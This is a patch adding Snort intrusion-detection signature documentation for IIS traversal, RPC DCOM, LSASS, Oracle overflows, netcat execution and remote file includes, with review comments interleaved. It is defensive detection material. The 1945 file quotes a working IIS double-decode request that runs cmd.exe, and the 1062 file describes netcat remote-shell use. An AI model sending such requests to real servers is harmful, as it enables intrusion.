+Nigel Houghton <nigel.houghton@sourcefire.com> 
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2126
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1069
+
+--
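Review bot: the product name is inconsistent: Detailed Information says "Electronic Commerce Suite" while Affected Systems says "iCat Electronica Commerce Suite 3.0"; fix the spelling in Affected Systems. Corrective Action "None known" is unhelpful for a 1999 issue with a Bugtraq and CVE entry; at minimum suggest upgrading or removing carbo.dll where the catalog feature is unused. The Detailed Information sentence runs straight into the example URL with no terminating punctuation; set the URL on its own line or end the sentence. The Nigel Houghton contributor line has a trailing space.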
--- /dev/null
+++ b/doc/signatures/1385.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1385
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
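Review bot: the Affected Systems section is empty; a generic entry such as "All web servers and applications using authentication" (the CGI files in this patch use the same pattern) would keep the file consistent. Typo "ona" in Detailed Information should be "on a". Summary and Detailed Information open with the same sentence; the Detailed Information paragraph should say what request pattern the rule looks for, since nothing in the file identifies it. Additional References is empty.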
--- /dev/null
+++ b/doc/signatures/100000357.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000357
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BASE" application running on a webserver. Access to the file "base_stat_common.php" using a remote file being passed as the "BASE_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "BASE_path" parameter in the "base_stat_common.php" script used by the "BASE" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BASE
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
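Review bot: the file opens with two blank lines before "Rule:", unlike the other signature files. The Attack Scenarios text ("An attacker can access an authentication mechanism and supply his/her own credentials") and the third Detailed Information paragraph are authentication boilerplate that do not match the remote file include through the "BASE_path" parameter of base_stat_common.php described in the Summary; replace them with the remote include scenario. Typo "ona" should be "on a". Additional References is empty.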
--- /dev/null
+++ b/doc/signatures/1945.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1945
+
+--
+Summary:
+This event is generated when an attempt is made use Microsoft double encoding of a "/" in a URL request.  This may permit an attacker to navigate to files and directories outside the web root of a vulnerable Internet Information Services (IIS) server. 
+
+--
+Impact:
+Remote access.  This attack can allow an attacker to execute commands a vulnerable IIS server. 
+
+--
+Detailed Information:
+User access should be restricted to an assigned web root directory and subdirectories when interacting with a web server.  Attackers who attempt to perform directory traversals outside the web root should be denied access.  A vulnerability exists in IIS web servers that allows directory traversal outside the web root directory when Micorosoft double encoding of specific characters is used.  This particular attack uses the double encoding of the "/" to escape the web root.  This may permit an attacker to execute commands on the vulnerable server. 
+
+--
+Affected Systems:
+IIS 3.0, 4.0, 5.0 servers
+
+--
+Attack Scenarios:
+An attacker can double encode a directory traversal character permitting execution of commands on the IIS server. 
+
+--
+Ease of Attack:
+Simple. 
+GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch referenced in the Microsoft link. 
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/2708
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms01-044.asp
+
+--
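Review bot: the example under Ease of Attack does not match the Summary. "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir" double-encodes a backslash (%5c, encoded again as %255c), whereas the Summary and Detailed Information say the rule concerns double encoding of "/" (which would be %2f); reconcile the two so the reader knows which encoding this SID matches. Typos: "made use" should be "made to use", "Micorosoft" should be "Microsoft", and Impact is missing "on" in "execute commands a vulnerable IIS server". Several lines end with trailing spaces.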
--- /dev/null
+++ b/doc/signatures/972.txt
@@ -0,0 +1,61 @@
+Will be obsolete when httpinspect is used
+Rule:
+
+--
+Sid:
+972
+
+--
+Summary:
+This event is generated when an attempt is made to access an Active Server Page (ASP) .asp file when the period is hex encoded as "%2e". 
+
+--
+Impact:
+Intelligence gathering activity.  A vulnerability exists that discloses the .asp file contents when it is reference using the "%2e" hex encoding. 
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) uses Active Server Page to supply HTML and server-side scripting.  ASP files use a .asp extension.  When the period of the .asp is hex-encoded with a "%2e" to reference an ASP file, the contents of the file are disclosed.
+
+--
+Affected Systems:
+Hosts running IIS 3.0
+
+--
+Attack Scenarios:
+An attacker can attempt use the hex-encoded reference to the .asp file to see the contents of the file.  Sensitive information may by disclosed depending on the selected file. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0253
+
+Bugtraq:
+http://www.securityfocus.com/bid/1814
+
+
+--
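Review bot: the first line "Will be obsolete when httpinspect is used" sits above "Rule:" and breaks the format every other signature file follows; it is an editorial note, not documentation, and should be dropped or moved into a comment. Typos: "when it is reference using" should be "referenced", "An attacker can attempt use" should be "attempt to use", "may by disclosed" should be "may be disclosed", and "Active Server Page" should be "Active Server Pages". The doubled blank line before the final "--" should be collapsed.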
--- /dev/null
+++ b/doc/signatures/1270.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1270
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) rstatd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port rstatd is using.  Attackers can also learn what versions of the rstatd protocol are accepted by rstatd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as rstatd run.  The rstatd RPC service can be queried for performance statistics obtained from the kernel including network, disk, and CPU.  This can provide valuable information to determine which host may make a suitable target to participate in a particular attack. 
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where rstatd runs.  This may be a precursor to querying rstatd for usage statistics.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access rstatd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for rstatd, not probes of the rstatd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the rstatd service itself. An attacker may attempt to go directly to the rstatd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS10
+
+
+--
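Review bot: style points only. "Easy." under Ease of Attack departs from the "Simple." wording used across the other files and has trailing spaces; the doubled blank lines after the Summary and before the final "--" should be collapsed. "Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines" reads better as "so that external access to RPC-enabled machines is denied". The False Negatives paragraph is the strongest part of this file: it explains what the rule does not see (direct connections to rstatd that skip the portmapper lookup), which the other files' "None known" entries do not.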
--- /dev/null
+++ b/doc/signatures/1062.txt
@@ -0,0 +1,52 @@
+Rule:  
+--
+Sid:
+1062
+--
+Summary:
+Netcat execution attempt - Netcat is a very flexible and powerfull tcp and udp port listener
+--
+Impact:
+Serious. Full compromise of the host is possible. An attacker may have already compromised your system using another exploit and installed netcat to easily access a remote shell
+--
+Detailed Information:
+This event is generated when an attempt is made to execute Netcat via a web session.
+
+Netcat can be used for port forwarding, remote shell binding, file transfer etc. It is a security risk if someone can use the tool remotetly
+--
+Attack Scenarios:
+Usually nc.exe is uploaded after a successfull attack with another exploit. Netcat may then be executed via a web session to spawn a shell session the attacker can use for further system compromise.
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+A simple www.yourhost.net/nc.exe can trigger this rule. check if the file exists and use further protection software (host based IDS) to protect you from unknown files which could be uploaded.
+
+--
+False Negatives:
+The filename nc.exe was renamed and netcat is on your host already with another filename, probably bound to a shell already.
+
+--
+Corrective Action:
+Remove nc.exe.
+
+Portscan your host and check your firewall log files for IP's accessing the suspect port where netcat listens to gain information about the attacker.
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin.
+
+This command may also be requested on a command line should the attacker gain access to the machine.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
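Review bot: the Affected Systems section is missing; the file jumps from Detailed Information to Attack Scenarios, and since the text refers to nc.exe and the web root/cgi-bin it should say something like "Web servers on Microsoft Windows hosts". The Summary is a fragment rather than the "This event is generated when ..." form used elsewhere. Typos: "powerfull", "remotetly", "successfull", "it's designated web root" (should be "its"), "IP's" (should be "IPs"), and "check if the file exists" should start a new sentence with a capital. The last Corrective Action sentence ("This command may also be requested on a command line ...") is not a corrective action and belongs under Attack Scenarios.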
--- /dev/null
+++ b/doc/signatures/2714.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2714
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure resume_subset_of_masters
+. This procedure is included in
+dbms_offline_og.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
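Review bot: the sentence naming the procedure is split so that a period starts a new line: "vulnerability in the procedure resume_subset_of_masters" / ". This procedure is included in" / "dbms_offline_og."; join it into one sentence. Affected Systems reads "Oracle Oracle9i" (vendor repeated). Corrective Action lacks a period, and Additional References is empty although the Summary calls this a "known vulnerability"; a reference identifier should be added.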
--- /dev/null
+++ b/doc/signatures/2507.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2507
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
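Review bot: typos: "suscessful" should be "successful" and "attcker" should be "attacker"; "The problem lies in an unchecked buffer in the LSASS service, suscessful exploitation may ..." is a comma splice and should be two sentences. Attack Scenarios is vague ("that could contain harmful code"); the Summary already says buffer overrun, so describe it as a request that overflows the unchecked buffer. Corrective Action says "Apply the appropriate vendor supplied patches" but Additional References is empty; the vendor bulletin for that patch should be cited.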
--- /dev/null
+++ b/doc/signatures/2919.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2919
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure register_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_untrusted.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
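Review bot: same split sentence as in 2714.txt: "vulnerability in the procedure register_snapshot_repgroup" / ". This procedure is included in" / "sys.dbms_repcat_untrusted."; join the three lines so the period does not begin a line. "Oracle Oracle9i" repeats the vendor, Corrective Action lacks a period, and Additional References is empty for what the Summary calls a "known vulnerability".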
--- /dev/null
+++ b/doc/signatures/1609.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1609
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
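Review bot: this file is word-for-word the same as 885.txt apart from the SID, including the "ona" typo in Detailed Information, so it has the same gap: nothing identifies which CGI script SID 1609 matches. Either name the target URI in the Summary or state in Detailed Information that the rule is a generic one. Additional References is empty.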
--- /dev/null
+++ b/doc/signatures/100000645.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000645
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "user_delete.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "user_delete.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
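Review bot: The third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host...") is generic CGI authentication text and does not describe a remote file include via the "admin_template_path" parameter; drop it or reword it to say the parameter is passed to an include without validation. Within the same hunk: "may indicate that an exploitation attempt has been attempted" in Summary is redundant (suggest "may indicate an exploitation attempt"), "running ona web server" should be "running on a web server", and "attackers choosing" should be "attacker's choosing" in both Impact and Detailed Information. Add a blank line before the "--" that follows "All systems running CGI applications using Indexu" to match the other sections, and Additional References is empty although a specific product, script and parameter are named.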
--- /dev/null
+++ b/doc/signatures/3071.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3071
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"status" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
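Review bot: Affected Systems names Mercury Mail Transport System 3.32 and 4.01a and Corrective Action says to "Upgrade to the latest non-affected version", yet Additional References is empty; add the vendor advisory or bug tracker entry so a reader can identify the fixed version. Also in this hunk: "a buffer overflow associated with the several commands of an IMAP service" in Summary should read "associated with several commands", "An attacker can supplied an overly long command" in Attack Scenarios should be "can supply", and "Brian Caswell<bmc@sourcefire.com>" in Contributors is missing the space before the address.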
--- /dev/null
+++ b/doc/signatures/3325.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3325
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
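Review bot: Attack Scenarios contradicts the rest of the document: it describes "a request for a file with an overly long filename via a network share", while Summary, Detailed Information and Corrective Action all describe malformed RPC DCOM requests sent to RPC ports. Replace it with a scenario consistent with Detailed Information (a malformed DCOM request sent to one of the RPC ports listed under Corrective Action). "Expoit code exists" in Ease of Attack should be "Exploit code exists", and Additional References is empty even though Corrective Action tells the reader to apply the vendor patch; cite the Microsoft bulletin for this issue.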
--- /dev/null
+++ b/doc/signatures/1480.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1480
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
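Review bot: Neither Summary ("a known vulnerability in a CGI web application") nor Affected Systems ("All systems running CGI applications") names the script or vulnerability sid 1480 actually matches, so an analyst cannot triage the alert from this document; add the script name and parameter to Summary and Detailed Information. Within Detailed Information, "running ona web server" should be "running on a web server", "attackers choosing" should be "attacker's choosing" (also in Impact), and the line "relationships between the victim server and other hosts can be exploited by the attacker." is wrapped far beyond the width used for the surrounding lines.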
--- /dev/null
+++ b/doc/signatures/2390.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2390
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with WuFtpd STOU command.
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+WuFtpd is an FTP server based on BSD ftpd. A vulnerability exists 
+with the STOU command that can cause a buffer overflow and permit the 
+execution of arbitrary commands with system privileges. The buffer 
+overflow can be caused by supplying an overly long argument to the STOU 
+command.
+
+The issue exists in the realpath() function. It is possible for an
+attacker to send malformed data to the realpath() function that will
+cause the overflow condition to occur.
+
+--
+Affected Systems:
+	Multiple systems using affected C libraries, libc
+
+--
+Attack Scenarios:
+An attacker can use one of the publicly available exploit scripts to
+cause the overflow to occur.
+
+--
+Ease of Attack:
+Simple.  Many exploits exist.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Use scp as an alternative to ftp
+
+Disallow ftp access to internal resources from external sources
+
+Recompile binaries statically linked to the system libc implementation
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
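Review bot: Affected Systems ("Multiple systems using affected C libraries, libc") does not match Summary, which ties the rule to the WuFtpd STOU command; list the affected WuFtpd versions, and clarify in Detailed Information whether "the realpath() function" refers to the FTP server's own implementation or the C library's, because the final Corrective Action item ("Recompile binaries statically linked to the system libc implementation") otherwise reads as a contradiction of the first ("Upgrade to the latest non-affected version of the software"). The last three Corrective Action items lack terminating periods, and Additional References is empty although Attack Scenarios and Ease of Attack both refer to publicly available exploits.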
--- /dev/null
+++ b/doc/signatures/1358.txt
@@ -0,0 +1,53 @@
+Rule: 
+
+--
+Sid: 1358
+
+-- 
+Summary: 
+A web command execution attack involving the use of a "traceroute" command
+
+-- 
+Impact: 
+Possible intelligence gathering activity. 
+
+-- 
+Detailed Information: 
+The attacker may have gained the ability to execute system commands remotely or the web server may be incorrectly configured to allow such access.
+
+This rule generates an event when a "traceroute" command is used over a plain-text (unencrypted) connection on one of the specified web ports to the target web server. The "traceroute" command may be used to perform information gathering activities. The rule looks for the "traceroute" command in the client to web server network traffic but does not indicate whether the command was actually successful. The presence of the "traceroute" command in the URI indicates that an attacker attempted to trick the web server into executing system commands in non-interactive mode i.e. without a valid shell session. 
+
+Alternatively this rule may trigger in an unencrypted HTTP tunneling connection to the server or a shell connection via another exploit against the web server.
+
+-- 
+Attack Scenarios: 
+An attacker uses a "traceroute" command to perform anonymous reconnaissance
+
+--
+Ease of Attack: 
+Simple. No exploit software required
+
+-- 
+False Positives: 
+none known
+
+--
+False Negatives: 
+none known
+
+-- 
+Corrective Action: 
+Check the web server software for vulnerabilities and possible upgrades or patches for the system to the latest version of the web software, also investigate the server logs for signs of compromise
+
